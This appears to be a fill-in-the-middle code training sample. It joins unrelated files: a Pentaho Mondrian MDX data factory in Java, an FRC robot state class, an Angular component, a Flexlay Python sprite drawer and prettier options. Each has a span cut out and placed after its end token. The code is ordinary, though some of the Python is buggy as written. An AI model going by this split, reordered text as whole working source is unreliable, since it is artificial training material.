messageFormat.format( new Object[] { o } ); } public Set<String> getCollectedParameter() { return Collections.unmodifiableSet( (Set<String>) collectedParameter.clone() ); } } private static final String ACCEPT_ROLES_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.static.accept"; private static final String ACCEPT_REGEXP_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.reg-exp.accept"; private static final String DENY_ROLE_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.static.deny"; private static final String DENY_REGEXP_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.reg-exp.deny"; private static final String ROLE_FILTER_ENABLE_CONFIG_KEY = "org.pentaho.reporting.engine.classic.extensions.datasources.mondrian.role-filter.enable"; private String jdbcUser; private String jdbcUserField; private String jdbcPassword; private String jdbcPasswordField; private String dynamicSchemaProcessor; private Boolean useSchemaPool; private Boolean useContentChecksum; private Properties baseConnectionProperties; private String role; private String roleField; private CubeFileProvider cubeFileProvider; private DataSourceProvider dataSourceProvider; private MondrianConnectionProvider mondrianConnectionProvider; private String designTimeName; private transient Connection connection; private static final String[] EMPTY_QUERYNAMES = new String[ 0 ]; private static final Log logger = LogFactory.getLog( AbstractMDXDataFactory.class ); private boolean membersOnAxisSorted; public AbstractMDXDataFactory() { this.mondrianConnectionProvider = ClassicEngineBoot.getInstance().getObjectFactory().get( MondrianConnectionProvider.class ); this.baseConnectionProperties = new Properties(); } public MondrianConnectionProvider getMondrianConnectionProvider() { return mondrianConnectionProvider; } public void setMondrianConnectionProvider( final MondrianConnectionProvider mondrianConnectionProvider ) { if ( mondrianConnectionProvider == null ) { throw new NullPointerException(); } this.mondrianConnectionProvider = mondrianConnectionProvider; } public String getDynamicSchemaProcessor() { return dynamicSchemaProcessor; } public void setDynamicSchemaProcessor( final String dynamicSchemaProcessor ) { this.dynamicSchemaProcessor = dynamicSchemaProcessor; } public boolean isMembersOnAxisSorted() { return membersOnAxisSorted; } public void setMembersOnAxisSorted( final boolean membersOnAxisSorted ) { this.membersOnAxisSorted = membersOnAxisSorted; } public Boolean isUseSchemaPool() { return useSchemaPool; } public void setUseSchemaPool( final Boolean useSchemaPool ) { this.useSchemaPool = useSchemaPool; } public Boolean isUseContentChecksum() { return useContentChecksum; } public void setUseContentChecksum( final Boolean useContentChecksum ) { this.useContentChecksum = useContentChecksum; } public String getRole() { return role; } public void setRole( final String role ) { this.role = role; } public String getRoleField() { return roleField; } public void setRoleField( final String roleField ) { this.roleField = roleField; } public CubeFileProvider getCubeFileProvider() { return cubeFileProvider; } public void setCubeFileProvider( final CubeFileProvider cubeFileProvider ) { this.cubeFileProvider = cubeFileProvider; } public DataSourceProvider getDataSourceProvider() { return dataSourceProvider; } public void setDataSourceProvider( final DataSourceProvider dataSourceProvider ) { this.dataSourceProvider = dataSourceProvider; } public String getJdbcUser() { return jdbcUser; } public void setJdbcUser( final String jdbcUser ) { this.jdbcUser = jdbcUser; } public String getJdbcPassword() { return jdbcPassword; } public void setJdbcPassword( final String jdbcPassword ) { this.jdbcPassword = jdbcPassword; } public String getJdbcUserField() { return jdbcUserField; } public void setJdbcUserField( final String jdbcUserField ) { this.jdbcUserField = jdbcUserField; } public String getJdbcPasswordField() { return jdbcPasswordField; } public void setJdbcPasswordField( final String jdbcPasswordField ) { this.jdbcPasswordField = jdbcPasswordField; } public Properties getBaseConnectionProperties() { return (Properties) baseConnectionProperties.clone(); } /** * Sets base connection properties. These will be overriden by any programatically set properties. * * @param connectionProperties */ public void setBaseConnectionProperties( final Properties connectionProperties ) { if ( connectionProperties != null ) { this.baseConnectionProperties.clear(); this.baseConnectionProperties.putAll( connectionProperties ); } } /** * Checks whether the query would be executable by this datafactory. This performs a rough check, not a full query. * * @param query * @param parameters * @return */ public boolean isQueryExecutable( final String query, final DataRow parameters ) { return true; } /** * Closes the data factory and frees all resources held by this instance. */ public void close() { if ( connection != null ) { connection.close(); } connection = null; } /** * Access the cache control on a per-datasource level. Setting "onlyCurrentSchema" to true will selectively purge the * mondrian cache for the specifc schema only. * * @param parameters * @param onlyCurrentSchema * @throws ReportDataFactoryException */ public void clearCache( final DataRow parameters, final boolean onlyCurrentSchema ) throws ReportDataFactoryException { try { final Connection connection = mondrianConnectionProvider .createConnection( computeProperties( parameters ), dataSourceProvider.getDataSource() ); try { final CacheControl cacheControl = connection.getCacheControl( null ); if ( onlyCurrentSchema ) { cacheControl.flushSchema( connection.getSchema() ); } else { cacheControl.flushSchemaCache(); } } finally { connection.close(); } } catch ( SQLException e ) { logger.error( e ); throw new ReportDataFactoryException( "Failed to create DataSource (SQL Exception - error code: " + e.getErrorCode() + "):" + e.toString(), e ); } catch ( MondrianException e ) { logger.error( e ); throw new ReportDataFactoryException( "Failed to create DataSource (Mondrian Exception):" + e.toString(), e ); } } /** * Queries a datasource. The string 'query' defines the name of the query. The Parameterset given here may contain * more data than actually needed for the query. * <p/> * The parameter-dataset may change between two calls, do not assume anything, and do not hold references to the * parameter-dataset or the position of the columns in the dataset. * * @param rawMdxQuery the mdx Query string. * @param parameters the parameters for the query * @return the result of the query as table model. * @throws org.pentaho.reporting.engine.classic.core.ReportDataFactoryException if an error occured while performing * the query. */ public Result performQuery( final String rawMdxQuery, final DataRow parameters ) throws ReportDataFactoryException { try { if ( connection == null ) { connection = mondrianConnectionProvider .createConnection( computeProperties( parameters ), dataSourceProvider.getDataSource() ); } } catch ( SQLException e ) { throw new ReportDataFactoryException( "Failed to create datasource:" + e.getLocalizedMessage(), e ); } catch ( MondrianException e ) { throw new ReportDataFactoryException( "Failed to create datasource:" + e.getLocalizedMessage(), e ); } try { if ( connection == null ) { throw new ReportDataFactoryException( "Factory is closed." ); } final MDXCompiler compiler = new MDXCompiler( parameters, getLocale() ); final String mdxQuery = compiler.translateAndLookup( rawMdxQuery, parameters ); // Alternatively, JNDI is possible. Maybe even more .. final Query query = connection.parseQuery( mdxQuery ); final Statement statement = query.getStatement(); final int queryTimeoutValue = calculateQueryTimeOut( parameters ); if ( queryTimeoutValue > 0 ) { statement.setQueryTimeoutMillis( queryTimeoutValue * 1000 ); } parametrizeQuery( parameters, query ); //noinspection deprecation final Result resultSet = connection.execute( query ); if ( resultSet == null ) { throw new ReportDataFactoryException( "query returned no resultset" ); } return resultSet; } catch ( MondrianException e ) { throw new ReportDataFactoryException( "Failed to create datasource:" + e.getLocalizedMessage(), e ); } } private void parametrizeQuery( final DataRow parameters, final Query query ) throws ReportDataFactoryException { final Parameter[] parameterDefs = query.getParameters(); for ( int i = 0; i < parameterDefs.length; i++ ) { final Parameter def = parameterDefs[ i ]; final Type parameterType = def.getType(); final Object parameterValue = preprocessMemberParameter( def, parameters, parameterType ); final Object processedParamValue = computeParameterValue( query, parameterValue, parameterType ); // Mondrian allows null values to be passed in, so we'll go ahead and // convert null values to their defaults for now until MONDRIAN-745 is // resolved. final Exp exp = def.getDefaultExp(); if ( processedParamValue == null && exp != null && exp instanceof Literal ) { Literal exp1 = (Literal) exp; def.setValue( exp1.getValue() ); } else { def.setValue( processedParamValue ); } } } private Object preprocessMemberParameter( final Parameter def, final DataRow parameters, final Type parameterType ) { Object parameterValue = parameters.get( def.getName() ); // Mondrian doesn't handle null MemberType/SetType parameters well (http://jira.pentaho.com/browse/MONDRIAN-745) // If parameterValue is null, give it the default value if ( parameterValue != null ) { return parameterValue; } try { if ( parameterType instanceof MemberType || parameterType instanceof SetType ) { return def.getDefaultExp().toString(); } } catch ( final Exception e ) { // Ignore - this is a safety procedure anyway } return null; } private Object computeParameterValue( final Query query, final Object parameterValue, final Type parameterType ) throws ReportDataFactoryException { final Object processedParamValue; if ( parameterValue != null ) { if ( parameterType instanceof StringType ) { if ( !( parameterValue instanceof String ) ) { throw new ReportDataFactoryException( parameterValue + " is incorrect for type " + parameterType ); } processedParamValue = parameterValue; } else if ( parameterType instanceof NumericType ) { if ( !( parameterValue instanceof Number ) ) { throw new ReportDataFactoryException( parameterValue + " is incorrect for type " + parameterType ); } processedParamValue = parameterValue; } else if ( parameterType instanceof MemberType ) { final MemberType memberType = (MemberType) parameterType; final Hierarchy hierarchy = memberType.getHierarchy(); if ( parameterValue instanceof String ) { final Member member = findMember( query, hierarchy, query.getCube(), String.valueOf( parameterValue ) ); if ( member != null ) { processedParamValue = new MemberExpr( member ); } else { processedParamValue = null; } } else { if ( !( parameterValue instanceof OlapElement ) ) { throw new ReportDataFactoryException( parameterValue + " is incorrect for type " + parameterType ); } else { processedParamValue = parameterValue; } } } else if ( parameterType instanceof SetType ) { final SetType setType = (SetType) parameterType; final Hierarchy hierarchy = setType.getHierarchy(); if ( parameterValue instanceof String ) { final String rawString = (String) parameterValue; final String[] memberStr = rawString.replaceFirst( "^ *\\{", "" ).replaceFirst( "} *$", "" ).split( "," ); final List<Member> list = new ArrayList<Member>( memberStr.length ); for ( int j = 0; j < memberStr.length; j++ ) { final String str = memberStr[ j ]; final Member member = findMember( query, hierarchy, query.getCube(), String.valueOf( str ) ); if ( member != null ) { list.add( member ); } } processedParamValue = list; } else { if ( !( parameterValue instanceof OlapElement ) ) { throw new ReportDataFactoryException( parameterValue + " is incorrect for type " + parameterType ); } else { processedParamValue = parameterValue; } } } else { processedParamValue = parameterValue; } } else { processedParamValue = null; } return processedParamValue; } private Member findMember( final Query query, final Hierarchy hierarchy, final Cube cube, final String parameter ) throws ReportDataFactoryException { try { final Member directValue = yuckyInternalMondrianLookup( query, hierarchy, parameter ); if ( directValue != null ) { return directValue; } } catch ( Exception e ) { // It is non fatal if that fails. Invalid input has this effect. } Member memberById = null; Member memberByUniqueId = null; final boolean searchForNames = MondrianProperties.instance().NeedDimensionPrefix.get() == false; final boolean missingMembersIsFatal = MondrianProperties.instance().IgnoreInvalidMembersDuringQuery.get(); try { final Member directValue = lookupDirectly( hierarchy, cube, parameter, searchForNames ); if ( directValue != null ) { return directValue; } } catch ( Exception e ) { // It is non fatal if that fails. Invalid input has this effect. } final Query memberQuery = connection.parseQuery( "SELECT " + hierarchy.getQualifiedName() // NON-NLS + ".AllMembers ON 0, {} ON 1 FROM " + cube.getQualifiedName() ); // NON-NLS final Result result = connection.execute( memberQuery ); try { final List<Position> positionList = result.getAxes()[ 0 ].getPositions(); for ( int i = 0; i < positionList.size(); i++ ) { final Position position = positionList.get( i ); for ( int j = 0; j < position.size(); j++ ) { final Member member = position.get( j ); if ( parameter.equals( MondrianUtil.getUniqueMemberName( member ) ) ) { if ( memberByUniqueId == null ) { memberByUniqueId = member; } else { logger .warn( "Encountered a member with a duplicate unique key: " + member.getQualifiedName() ); // NON-NLS } } if ( searchForNames == false ) { continue; } if ( parameter.equals( member.getName() ) ) { if ( memberById == null ) { memberById = member; } else { logger.warn( "Encountered a member with a duplicate name: " + member.getQualifiedName() ); // NON-NLS } } } } } finally { result.close(); } if ( memberByUniqueId != null ) { return memberByUniqueId; } if ( memberById != null ) { return memberById; } if ( missingMembersIsFatal ) { throw new ReportDataFactoryException( "No member matches parameter value '" + parameter + "'." ); } return null; } private Member lookupDirectly( final Hierarchy hierarchy, final Cube cube, final String parameter, final boolean searchForNames ) { Member memberById = null; Member memberByUniqueId = null; final Query queryDirect = connection.parseQuery( "SELECT STRTOMEMBER(" + quote( parameter ) + ") ON 0, {} ON 1 FROM " // NON-NLS + cube.getQualifiedName() ); final Result resultDirect = connection.execute( queryDirect ); try { final List<Position> positionList = resultDirect.getAxes()[ 0 ].getPositions(); for ( int i = 0; i < positionList.size(); i++ ) { final Position position = positionList.get( i ); for ( int j = 0; j < position.size(); j++ ) { final Member member = position.get( j ); // If the parameter starts with '[', we'll assume we have the full // member specification specification. Otherwise, keep the funky lookup // route. We do check whether we get a second member (heck, should not // happen, but I've seen pigs fly already). if ( parameter.startsWith( "[" ) ) { if ( memberByUniqueId == null ) { memberByUniqueId = member; } else { logger.warn( "Encountered a member with a duplicate key: " + member.getQualifiedName() ); // NON-NLS } } if ( searchForNames == false ) { continue; } if ( parameter.equals( member.getName() ) ) { if ( memberById == null ) { memberById = member; } else { logger.warn( "Encountered a member with a duplicate name: " + member.getQualifiedName() ); // NON-NLS } } } } } finally { resultDirect.close(); } if ( memberByUniqueId != null ) { final Hierarchy memberHierarchy = memberByUniqueId.getHierarchy(); if ( hierarchy != memberHierarchy ) { if ( ObjectUtilities.equal( hierarchy, memberHierarchy ) == false ) { logger .warn( "Cannot match hierarchy of member found with the hierarchy specfied in the parameter: " // NON-NLS + "Unabe to guarantee that the correct member has been queried, returning null." ); // NON-NLS return null; } } return memberByUniqueId; } if ( memberById != null ) { final Hierarchy memberHierarchy = memberById.getHierarchy(); if ( hierarchy != memberHierarchy ) { if ( ObjectUtilities.equal( hierarchy, memberHierarchy ) == false ) { logger .warn( "Cannot match hierarchy of member found with the hierarchy specfied in the parameter: " // NON-NLS + "Unabe to guarantee that the correct member has been queried, returning null" ); // NON-NLS return null; } } return memberById; } return null; } protected Member yuckyInternalMondrianLookup( final Query query, final Hierarchy hierarchy, final String parameter ) { final Member memberById = (Member) Util.lookup( query, Util.parseIdentifier( parameter ) ); if ( memberById != null ) { final Hierarchy memberHierarchy = memberById.getHierarchy(); if ( hierarchy != memberHierarchy ) { if ( ObjectUtilities.equal( hierarchy, memberHierarchy ) == false ) { logger .warn( "Cannot match hierarchy of member found with the hierarchy specfied in the parameter: " // NON-NLS + "Unabe to guarantee that the correct member has been queried, returning null" ); // NON-NLS return null; } } return memberById; } return null; } protected int extractQueryLimit( final DataRow parameters ) { final Object queryLimit = parameters.get( DataFactory.QUERY_LIMIT ); final int queryLimitValue; if ( queryLimit instanceof Number ) { final Number i = (Number) queryLimit; queryLimitValue = Math.max( 0, i.intValue() ); } else { // means no limit at all queryLimitValue = 0; } return queryLimitValue; } private String computeRole( final DataRow parameters ) throws ReportDataFactoryException { if ( roleField != null ) { final Object field = parameters.get( roleField ); if ( field != null ) { if ( field instanceof Object[] ) { final Object[] roleArray = (Object[]) field; final StringBuffer buffer = new StringBuffer(); final int length = roleArray.length; for ( int i = 0; i < length; i++ ) { final Object o = roleArray[ i ]; if ( o == null ) { continue; } final String role = filter( String.valueOf( o ) ); if ( role == null ) { continue; } buffer.append( quoteRole( role ) ); } return buffer.toString(); } else if ( field.getClass().isArray() ) { final StringBuffer buffer = new StringBuffer(); final int length = Array.getLength( field ); for ( int i = 0; i < length; i++ ) { final Object o = Array.get( field, i ); if ( o == null ) { continue; } final String role = filter( String.valueOf( o ) ); if ( role == null ) { continue; } buffer.append( quoteRole( role ) ); } return buffer.toString(); } final String role = filter( String.valueOf( field ) ); if ( role != null ) { return role; } } } return filter( role ); } private String quoteRole( final String role ) { if ( role.indexOf( ',' ) == -1 ) { return role; } final StringBuffer b = new StringBuffer( role.length() + 5 ); final char[] chars = role.toCharArray(); for ( int i = 0; i < chars.length; i++ ) { final char c = chars[ i ]; if ( c == ',' ) { b.append( c ); } b.append( c ); } return b.toString(); } private String computeJdbcUser( final DataRow parameters ) { if ( jdbcUserField != null ) { final Object field = parameters.get( jdbcUserField ); if ( field != null ) { return String.valueOf( field ); } } return jdbcUser; } private String computeJdbcPassword( final DataRow parameters ) { if ( jdbcPasswordField != null ) { final Object field = parameters.get( jdbcPasswordField );<|fim▁hole|> } } return jdbcPassword; } private Properties computeProperties( final DataRow parameters ) throws ReportDataFactoryException { if ( cubeFileProvider == null ) { throw new ReportDataFactoryException( "No CubeFileProvider" ); } final Properties properties = getBaseConnectionProperties(); final String catalog = cubeFileProvider.getCubeFile( getResourceManager(), getContextKey() ); if ( catalog == null ) { throw new ReportDataFactoryException( "No valid catalog given." ); } properties.setProperty( "Catalog", catalog ); // NON-NLS final String role = computeRole( parameters ); if ( role != null ) { properties.setProperty( "Role", role ); // NON-NLS } final String jdbcUser = computeJdbcUser( parameters ); if ( StringUtils.isEmpty( jdbcUser ) == false ) { properties.setProperty( "JdbcUser", jdbcUser ); // NON-NLS } final String jdbcPassword = computeJdbcPassword( parameters ); if ( StringUtils.isEmpty( jdbcPassword ) == false ) { properties.setProperty( "JdbcPassword", jdbcPassword ); // NON-NLS } final Locale locale = getLocale(); if ( locale != null ) { properties.setProperty( "Locale", locale.toString() ); // NON-NLS } if ( isUseContentChecksum() != null ) { properties.setProperty( "UseContentChecksum", String.valueOf( isUseContentChecksum() ) ); // NON-NLS } if ( isUseSchemaPool() != null ) { properties.setProperty( "UseSchemaPool", String.valueOf( isUseSchemaPool() ) ); // NON-NLS } if ( getDynamicSchemaProcessor() != null ) { properties.setProperty( "DynamicSchemaProcessor", getDynamicSchemaProcessor() ); // NON-NLS } return properties; } public AbstractMDXDataFactory clone() { final AbstractMDXDataFactory dataFactory = (AbstractMDXDataFactory) super.clone(); dataFactory.connection = null; if ( this.baseConnectionProperties != null ) { dataFactory.baseConnectionProperties = (Properties) this.baseConnectionProperties.clone(); } return dataFactory; } public String getDesignTimeName() { return designTimeName; } public void setDesignTimeName( final String designTimeName ) { this.designTimeName = designTimeName; } /** * Returns all known query-names. A data-factory may accept more than the query-names returned here. * * @return the known query names. */ public String[] getQueryNames() { return EMPTY_QUERYNAMES; } /** * Attempts to cancel the query process that is generating the data for this data factory. If it is not possible to * cancel the query, this call should be ignored. */ public void cancelRunningQuery() { } protected static String quote( final String original ) { // This solution needs improvements. Copy blocks instead of single // characters. final int length = original.length(); final StringBuffer b = new StringBuffer( length * 12 / 10 ); b.append( '"' ); for ( int i = 0; i < length; i++ ) { final char c = original.charAt( i ); if ( c == '"' ) { b.append( '"' ); b.append( '"' ); } else { b.append( c ); } } b.append( '"' ); return b.toString(); } private String filter( final String role ) throws ReportDataFactoryException { final Configuration configuration = ClassicEngineBoot.getInstance().getGlobalConfig(); if ( "true".equals( configuration.getConfigProperty( ROLE_FILTER_ENABLE_CONFIG_KEY ) ) == false ) { return role; } final Iterator staticDenyKeys = configuration.findPropertyKeys( DENY_ROLE_CONFIG_KEY ); while ( staticDenyKeys.hasNext() ) { final String key = (String) staticDenyKeys.next(); final String value = configuration.getConfigProperty( key ); if ( ObjectUtilities.equal( value, role ) ) { return null; } } final Iterator regExpDenyKeys = configuration.findPropertyKeys( DENY_REGEXP_CONFIG_KEY ); while ( regExpDenyKeys.hasNext() ) { final String key = (String) regExpDenyKeys.next(); final String value = configuration.getConfigProperty( key ); try { if ( role.matches( value ) ) { return null; } } catch ( PatternSyntaxException pe ) { throw new ReportDataFactoryException( "Unable to match reg-exp role filter:", pe ); } } boolean hasAccept = false; final Iterator staticAcceptKeys = configuration.findPropertyKeys( ACCEPT_ROLES_CONFIG_KEY ); while ( staticAcceptKeys.hasNext() ) { hasAccept = true; final String key = (String) staticAcceptKeys.next(); final String value = configuration.getConfigProperty( key ); if ( ObjectUtilities.equal( value, role ) ) { return role; } } final Iterator regExpAcceptKeys = configuration.findPropertyKeys( ACCEPT_REGEXP_CONFIG_KEY ); while ( regExpAcceptKeys.hasNext() ) { hasAccept = true; final String key = (String) regExpAcceptKeys.next(); final String value = configuration.getConfigProperty( key ); try { if ( role.matches( value ) ) { return role; } } catch ( PatternSyntaxException pe ) { throw new ReportDataFactoryException( "Unable to match reg-exp role filter:", pe ); } } if ( hasAccept == false ) { return role; } return null; } protected String translateQuery( final String query ) { return query; } protected String computedQuery( final String queryName, final DataRow parameters ) throws ReportDataFactoryException { return queryName; } public ArrayList<Object> getQueryHash( final String queryRaw, final DataRow parameter ) throws ReportDataFactoryException { final ArrayList<Object> list = new ArrayList<Object>(); list.add( getClass().getName() ); list.add( translateQuery( queryRaw ) ); if ( getCubeFileProvider() != null ) { list.add( getCubeFileProvider().getConnectionHash() ); } if ( getDataSourceProvider() != null ) { list.add( getDataSourceProvider().getConnectionHash() ); } list.add( getMondrianConnectionProvider().getConnectionHash( computeProperties( parameter ) ) ); list.add( computeProperties( parameter ) ); return list; } public String[] getReferencedFields( final String queryName, final DataRow parameters ) throws ReportDataFactoryException { final boolean isNewConnection = connection == null; try { if ( connection == null ) { connection = mondrianConnectionProvider.createConnection ( computeProperties( parameters ), dataSourceProvider.getDataSource() ); } } catch ( SQLException e ) { logger.error( e ); throw new ReportDataFactoryException( "Failed to create DataSource (SQL Exception - error code: " + e.getErrorCode() + "):" + e.toString(), e ); } catch ( MondrianException e ) { logger.error( e ); throw new ReportDataFactoryException( "Failed to create DataSource (Mondrian Exception):" + e.toString(), e ); } try { if ( connection == null ) { throw new ReportDataFactoryException( "Factory is closed." ); } final LinkedHashSet<String> parameter = new LinkedHashSet<String>(); final MDXCompiler compiler = new MDXCompiler( parameters, getLocale() ); final String computedQuery = computedQuery( queryName, parameters ); final String mdxQuery = compiler.translateAndLookup( computedQuery, parameters ); parameter.addAll( compiler.getCollectedParameter() ); // Alternatively, JNDI is possible. Maybe even more .. final Query query = connection.parseQuery( mdxQuery ); final Parameter[] queryParameters = query.getParameters(); for ( int i = 0; i < queryParameters.length; i++ ) { final Parameter queryParameter = queryParameters[ i ]; parameter.add( queryParameter.getName() ); } if ( jdbcUserField != null ) { parameter.add( jdbcUserField ); } if ( roleField != null ) { parameter.add( roleField ); } parameter.add( DataFactory.QUERY_LIMIT ); return parameter.toArray( new String[ parameter.size() ] ); } catch ( MondrianException e ) { throw new ReportDataFactoryException( "Failed to create datasource:" + e.getLocalizedMessage(), e ); } finally { if ( isNewConnection ) { close(); } } } public void initialize( final DataFactoryContext dataFactoryContext ) throws ReportDataFactoryException { super.initialize( dataFactoryContext ); membersOnAxisSorted = "true".equals ( dataFactoryContext.getConfiguration() .getConfigProperty( MondrianDataFactoryModule.MEMBER_ON_AXIS_SORTED_KEY ) ); } }<|fim▁end|>
if ( field != null ) { return String.valueOf( field );
<|file_name|>State.java<|end_file_name|><|fim▁begin|>package org.usfirst.frc.team5940.states; import edu.wpi.first.wpilibj.RobotBase; public abstract class State implements Runnable { @SuppressWarnings("unused") protected RobotBase robot; //Update recall delay private int delay = 25; /** * Constructor * @param robot Saved in this class, allows states to determine information about the robot. This should be passed the subclass of RobotBase of your code. */ public State (RobotBase robot){ //Set the robot this.robot = robot; } /** * Overriden run method for Runnable superclass. Started with STATE_RUNNABLE_NAME.run(); or STATE_THREAD_NAME.start(); */ @Override public void run() { //Initilize this.init(); //Continue until interupdete while (!Thread.interrupted()) { //Update update(); //try to sleep try { Thread.sleep(delay); } catch (InterruptedException e) { /*Print the error*/e.printStackTrace(); } } } /** * Called once right after run() is called, even if the Thread is interrupted. */ <|fim▁hole|> /** * Called forever with a delay of delay (the var) while the Thread is not interrupted. */ protected abstract void update(); }<|fim▁end|>
protected abstract void init();
<|file_name|>cpp-list.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit, Input, ChangeDetectorRef } from '@angular/core'; import { Cpp } from '../../../shared/interfaces/cpps.interface'; import { FormBuilder, FormGroup, Validators, FormArray } from '@angular/forms'; import { Subject } from 'rxjs/Subject'; import { ActivatedRoute } from '@angular/router'; import { FormSetService } from '../../../services/form-set.service'; import { CppTip, CppGrad, CppEmitent } from '../../../shared/models/registre.model'; @Component({ selector: 'app-cpp-list', templateUrl: './cpp-list.component.html', styleUrls: ['./cpp-list.component.css'] }) export class CppListComponent implements OnInit { // child notifies if new add is finished public static addNewActive: Subject<boolean> = new Subject(); @Input('cppFormData') public cppFormData: Cpp[]; public formCpps: FormGroup; public registruCpp; public registruCppTip: CppTip[] = [ { id: 1, nume: 'Rezident' }, { id: 2, nume: 'Specialitate Medicala' }, { id: 3, nume: 'Supraspecializare' }, { id: 4, nume: 'Competenta' }, { id: 5, nume: 'Atestat de studii complementare' }, { id: 6, nume: 'Abilitate' } ]; public registruCppGrad: CppGrad[] = [ { id: 1, nume: 'Specialist' }, { id: 2, nume: 'Primar' } ]; public registruCppEmitent: CppEmitent[] = [ { id: 'MS', nume: 'Ministerul Sanatatii' }, { id: 'AL', nume: 'Alt Emitent' } ];<|fim▁hole|> private _cd: ChangeDetectorRef, private _rounterSnapshot: ActivatedRoute, private _formSet: FormSetService, private _fb: FormBuilder, ) { } ngOnInit() { this.registruCpp = this._rounterSnapshot.snapshot.data['regCpp']; this.setForm(); CppListComponent.addNewActive.subscribe(res => { this.addActive = res; }); } private setForm(): void { this.formCpps = this._formSet.cpps('initFormCpps', null, this.formCpps); // TODO; de revazut daca nu il putem baga in serviciul de mai sus this.formCpps.addControl('cpps', new FormArray([])); } addCpp() { const newCppData: Cpp = { 'id_cpp': null, // 212, 'id_mem': null, // 126, 'reg_cpp_tip_id': null, // 2, 'reg_cpp_id': null, // 1034, 'grad_prof_cpp_id': null, // 1, 'date_start': '', // '2007-12-01', 'date_end': '', // '0000-00-00', 'emitent': '', // 'MS', 'act_serie': '', // 'ZX', 'act_numar': '', // 1234, 'act_data': '', // '2008-01-08', 'act_descriere': '', // '', 'obs': '', // 'nu are', 'updated': '', // '2017-04-08 09:59:32', 'ro': '', // 'false' }; this.cppFormData.unshift(newCppData); this._cd.detectChanges(); this.addActive = !this.addActive; return false; } }<|fim▁end|>
addActive = true; constructor(
<|file_name|>sprite_stroke_drawer.py<|end_file_name|><|fim▁begin|># Flexlay - A Generic 2D Game Editor # Copyright (C) 2014 Ingo Ruhnke <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from flexlay.wip.bitmap_layer import BitmapLayer from flexlay.blend_func import BlendFunc from flexlay import DrawerProperties from flexlay.math import Rect, Point, Size, Origin class Surface: pass class SpriteStrokeDrawer: def __init__(self, drawer): self.mode = SpriteStrokeDrawer.DM_NORMAL self.drawer = drawer def draw(self, stroke, gc): if DrawerProperties.current.get_brush().is_null() or stroke.get_dab_count() == 0: return dabs = stroke.get_interpolated_dabs(DrawerProperties.current.get_spacing() * DrawerProperties.current.get_size(), DrawerProperties.current.get_spacing() * DrawerProperties.current.get_size()) for i, dab in enumerate(self.dabs): sprite = DrawerProperties.current.get_brush().get_sprite() color = DrawerProperties.current.get_color() sprite.set_color(color) sprite.set_alpha((color.get_alpha() / 255.0) * dab.pressure) sprite.set_scale(DrawerProperties.current.get_size() * dab.pressure, DrawerProperties.current.get_size() * dab.pressure) if gc is not None: # DO Multipass: # 1: GL_ZERO, GL_DST_ALPHA # 2: GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA # brush.set_blend_func_separate(BlendFunc.zero, BlendFunc.dst_alpha, # BlendFunc.zero, BlendFunc.one) # brush.draw(dab.pos.x, dab.pos.y, gc) if self.mode == SpriteStrokeDrawer.DM_NORMAL: sprite.set_blend_func_separate(BlendFunc.src_alpha, BlendFunc.one_minus_src_alpha, BlendFunc.one, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_ADDITION: sprite.set_blend_func_separate(BlendFunc.src_alpha, BlendFunc.one, BlendFunc.zero, BlendFunc.one) # BlendFunc.one, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_ERASE: sprite.set_blend_func(BlendFunc.zero, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_SMUDGE: if dab != dabs[0]: canvas = BitmapLayer.current.get_canvas() buffer = canvas.get_pixeldata( Rect(Point(int(self.dabs[i - 1].pos.x) - sprite.width / 2, int(self.dabs[i - 1].pos.y) - sprite.height / 2), Size(sprite.width, sprite.height))) surface = Surface(buffer) # surface.set_blend_func_separate(BlendFunc.src_alpha, BlendFunc.one_minus_src_alpha, # BlendFunc.one, BlendFunc.zero) surface.set_alignment(Origin.center) surface.set_alpha(0.5)<|fim▁hole|> # surface.set_scale(DrawerProperties.current.get_size(), # DrawerProperties.current.get_size()) surface.draw(dab.pos.x, dab.pos.y, gc.gc) else: print("Error: SpriteStrokeDrawer: Unknown draw mode: ", self.mode) else: if self.mode == SpriteStrokeDrawer.DM_NORMAL: sprite.set_blend_func(BlendFunc.src_alpha, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_ADDITION: sprite.set_blend_func(BlendFunc.src_alpha, BlendFunc.one) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_ERASE: sprite.set_blend_func(BlendFunc.zero, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) elif self.mode == SpriteStrokeDrawer.DM_SMUDGE: sprite.set_blend_func(BlendFunc.src_alpha, BlendFunc.one_minus_src_alpha) sprite.draw(dab.pos.x, dab.pos.y, gc.gc) else: print("Error: SpriteStrokeDrawer: Unknown draw mode:", self.mode) def set_mode(self, mode): self.mode = mode def get_mode(self): return self.mode # EOF #<|fim▁end|>
<|file_name|>options.js<|end_file_name|><|fim▁begin|>"use strict"; const commonOptions = require("../common/common-options"); // format based on https://github.com/prettier/prettier/blob/master/src/main/core-options.js module.exports = { bracketSpacing: commonOptions.bracketSpacing, singleQuote: commonOptions.singleQuote,<|fim▁hole|><|fim▁end|>
proseWrap: commonOptions.proseWrap };
